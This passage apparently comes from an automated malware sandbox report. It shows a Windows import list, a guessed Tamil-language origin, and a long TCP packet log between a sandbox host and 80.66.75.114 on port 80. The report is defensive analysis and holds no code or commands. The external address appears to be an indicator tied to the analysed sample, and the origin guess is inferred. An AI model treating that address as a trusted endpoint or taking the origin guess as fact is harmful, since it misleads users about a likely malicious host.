GetCurrentThreadId, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetLocaleInfoW, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetStringTypeW, CloseHandle, CreateFileW
                                                USER32.dllGetMenuInfo
                                                GDI32.dllCreateDCW, GetCharWidthI, CreateDCA, GetCharWidth32A
                                                ole32.dllStringFromIID, CoSuspendClassObjects, CoRegisterPSClsid
                                                WINHTTP.dllWinHttpOpen, WinHttpCheckPlatform

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                TamilIndia
                                                TamilSri Lanka

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 8, 2024 04:24:09.724334002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:09.729191065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:09.733225107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:09.736298084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:09.741353989 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:10.460727930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:10.460788012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:10.502087116 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:10.509469986 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:10.739790916 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:10.739895105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:10.746113062 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:10.753988981 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:10.963947058 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:10.964083910 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:10.969579935 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:10.974446058 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194689035 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194709063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194730997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194746017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194760084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194776058 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194802046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194814920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.194823027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.194875002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.195065022 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.195086956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.195120096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.195138931 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.195468903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.195485115 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.195498943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.195524931 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.195542097 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.199644089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.199695110 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.199707985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.199738026 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.313769102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.313808918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.313823938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.313838959 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.313862085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.313899040 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.313906908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.313913107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.313925028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.313950062 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.313961983 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.314136982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314152002 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314167023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314182043 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314187050 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.314202070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.314230919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.314589024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314603090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314619064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314635038 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.314640045 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314647913 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.314655066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314670086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.314678907 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.314703941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.315382004 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.315442085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.315448046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.315463066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.315476894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.315486908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.315493107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.315506935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.315514088 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.315521955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.315526009 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.315555096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.328883886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.328905106 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.328918934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.328950882 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.328963995 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.433515072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433602095 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433615923 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433629990 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433645964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433655977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.433681011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.433734894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433779955 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.433888912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433903933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433917046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433924913 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.433931112 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433938026 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.433947086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.433958054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.433969975 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.433989048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434034109 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434046984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434061050 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434086084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434118032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434140921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434164047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434178114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434191942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434206009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434206963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434220076 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434226036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434236050 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434247971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434250116 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434266090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434272051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434295893 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434324026 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434595108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434609890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434623957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434648037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434674978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434676886 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434689045 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434711933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434724092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434726954 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434741974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434747934 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434757948 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.434775114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.434796095 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.435517073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435532093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435554028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435559034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.435570002 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435584068 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435585022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.435605049 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.435606003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435621977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435630083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.435636044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435651064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.435661077 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.435679913 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.435703039 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.436357975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.436404943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.436419964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.436453104 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.436476946 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.436491013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.436506033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.436520100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.436548948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.436572075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.481280088 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:11.486166000 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.708328009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:11.708409071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:13.850475073 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:13.855223894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:14.076299906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:14.076395035 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:16.100605011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:16.105362892 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:16.322865963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:16.322942019 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:18.334892035 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:18.339716911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:18.559938908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:18.560009003 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:20.585094929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:20.589876890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:20.809391022 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:20.809511900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:22.835894108 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:22.840714931 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:23.061348915 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:23.061414957 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:25.084901094 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:25.089735031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:25.314899921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:25.317240000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:27.335062027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:27.340095997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:27.563453913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:27.563519001 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:29.585211992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:29.590142965 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:29.827352047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:29.827415943 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:31.850446939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:32.068552017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:32.381088018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:32.576001883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:32.576951981 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:32.576965094 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:32.794883013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:32.795245886 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:34.820627928 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:34.849895000 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:35.065159082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:35.065212011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.116286039 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.121752977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355118990 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355138063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355153084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355163097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355173111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355184078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355192900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355215073 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355259895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355268002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355273008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355319977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355319977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355349064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355359077 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355367899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355391026 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355416059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.473999023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474018097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474026918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474061012 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474097013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474107027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474127054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474185944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474214077 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474277973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474277973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474400043 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474411964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474421978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474448919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474466085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474556923 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474567890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474579096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474587917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474601030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474631071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474751949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474807024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474817038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474829912 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474847078 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475337029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475347996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475357056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475368023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475379944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475393057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475400925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475405931 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475413084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475424051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475429058 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475435019 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475455999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475477934 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593200922 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593241930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593252897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593264103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593281984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593285084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593319893 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593329906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593333960 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593343019 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593368053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593379974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593379974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593391895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593404055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593416929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593446016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593446016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593521118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593533039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593543053 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593554020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593559027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593566895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593571901 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593579054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593589067 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593599081 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593600988 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593625069 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593683958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594238997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594249964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594264984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594274044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594284058 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594295025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594311953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594338894 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594501972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594546080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594553947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594564915 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594592094 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594608068 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594613075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594624043 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594634056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594645023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594655037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594687939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595194101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595208883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595218897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595227957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595238924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595253944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595289946 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595298052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595308065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595316887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595331907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595338106 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595347881 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595350027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595364094 CEST804973880.66.75.114192.168.2.6
